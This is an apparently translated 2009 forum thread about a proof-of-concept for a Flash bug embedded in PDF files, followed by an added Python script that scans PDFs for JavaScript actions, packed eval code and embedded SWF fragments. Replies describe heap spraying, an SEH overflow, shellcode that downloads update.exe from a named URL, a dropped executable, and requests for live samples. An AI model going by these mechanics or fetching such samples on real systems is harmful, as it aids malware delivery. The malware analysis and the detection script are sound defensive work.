[Repost] PoC for the new Flash vulnerability...
Posted: 2009-7-25 09:57 5502

@hdmoore live exploit sample for the new Flash bug (embedded in PDF)

Don't play with it if you don't know what it does...  This virus is srs business. /str0ke

http://www.milw0rm.com/exploits/9233

# milw0rm.com [2009-07-23]

Latest replies (13)
2
I'm a total newbie and really don't know what this thing means. Could some expert explain it? Is it garbled text?
2009-7-25 10:33
0
3
Going to take a look...
2009-7-25 11:07
0
4
Why can't I find this link on the home page? Is it an internal link?
2009-7-25 16:12
0
5
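A large number of 0c0c values are written to the stack, which eventually causes a memory access fault and triggers an SEH stack overflow.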
2009-7-25 22:36
0
6
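I think the real reason it was removed is probably that this PoC is not the 0day from the 22nd; the latest one should be a swf file embedded in a PDF. Of course, it can't be ruled out that a do be is unhappy :))

This is actually an old getIcon exploit.

In the shellcode:
URLMON.DLL, URLDownloadToFileA, update.exe, crash.php, http://viorfjoj-2.com/2/update.php?id=0

However, http://viorfjoj-2.com appears to have been shut down already.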
2009-7-26 11:37
0
7
41.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
/Font <<
/F1 5 0 R
>>
/XObject <<
>>
>>
endobj
6 0 obj
<<
/Names [(HUYAKJS) 7 0 R ]
>>
endobj
7 0 obj
<<
/S /JavaScript

Is this part of the code??
2009-7-27 00:13
0
8
Does anyone have the full exploit code for this vulnerability? I'd like to study it. Preferably decrypted.
2009-7-29 10:37
0
9
I really don't understand this.
2009-7-29 11:46
0
10
This is where the vulnerabilities come from...
2009-7-29 12:11
0
11
[QUOTE=dayang;661527]41.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF...[/QUOTE]

No. There are two swf file fragments that start with FWS. It drops the file SUCHOST.EXE
2009-7-29 20:49
0
12
Does the expert above have a sample?
2009-7-30 00:37
0
13
Every time it's that svchost.exe shellcode......
2009-7-30 00:41
0
14
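See this article to learn more about the vulnerability; it can be identified by the jump address and the shellcode.

http://www.avertlabs.com/research/blog/index.php/2009/07/22/new-0-day-attacks-using-pdf-documents/

Look around online for a sample; you should be able to find one.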
2009-7-30 09:08
0
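An added example, not part of the original thread or any poster's code: a static triage pass over a PDF for the markers the replies above mention, namely a /JavaScript action with a /JS key wrapped in the p,a,c,k,e,d packer (reply 7) and FWS-prefixed SWF fragments inside streams (reply 11). The function names and the constructed sample document are assumptions made for illustration.

```python
import re
import zlib

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
SWF_MAGIC = re.compile(rb"(?:FWS|CWS)[\x01-\x20]")  # signature + version byte
PACKER = re.compile(rb"eval\\?\(\s*function\\?\(p,a,c,k,e,d")

def normalize_names(data: bytes) -> bytes:
    """Undo #xx hex escapes that can hide PDF names (/J#61vaScript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def stream_bodies(data: bytes):
    """Yield every stream body, inflated when it is zlib (FlateDecode) data."""
    for m in STREAM_RE.finditer(data):
        raw = m.group(1)
        try:
            yield zlib.decompressobj().decompress(raw)
        except zlib.error:
            yield raw  # not Flate data: scan the bytes as stored

def triage(data: bytes) -> dict:
    """Report which of the thread's markers are present in a PDF."""
    names = normalize_names(data)
    bodies = list(stream_bodies(data))
    return {
        "javascript_action": b"/JavaScript" in names,
        "js_key": re.search(rb"/JS\b", names) is not None,
        "packed_eval": any(PACKER.search(b) for b in [data] + bodies),
        "embedded_swf": sum(len(SWF_MAGIC.findall(b)) for b in bodies),
    }

def constructed_sample() -> bytes:
    """Constructed, inert test document: dummy SWF header, empty packer stub."""
    swf = b"FWS\x09" + (64).to_bytes(4, "little") + b"\x00" * 56
    packed = zlib.compress(swf)
    return (b"%PDF-1.4\n7 0 obj\n<< /S /J#61vaScript "
            b"/JS (eval\\(function\\(p,a,c,k,e,d\\){return p}\\)) >>\nendobj\n"
            b"8 0 obj\n<< /Filter /FlateDecode /Length "
            + str(len(packed)).encode() + b" >>\nstream\n" + packed
            + b"\nendstream\nendobj\n%%EOF\n")

if __name__ == "__main__":
    print(triage(constructed_sample()))
```

The SWF check only sees fragments stored raw or Flate-compressed in a stream; other filters (ASCIIHex, ASCII85, chained filters) would need their own decoders before scanning.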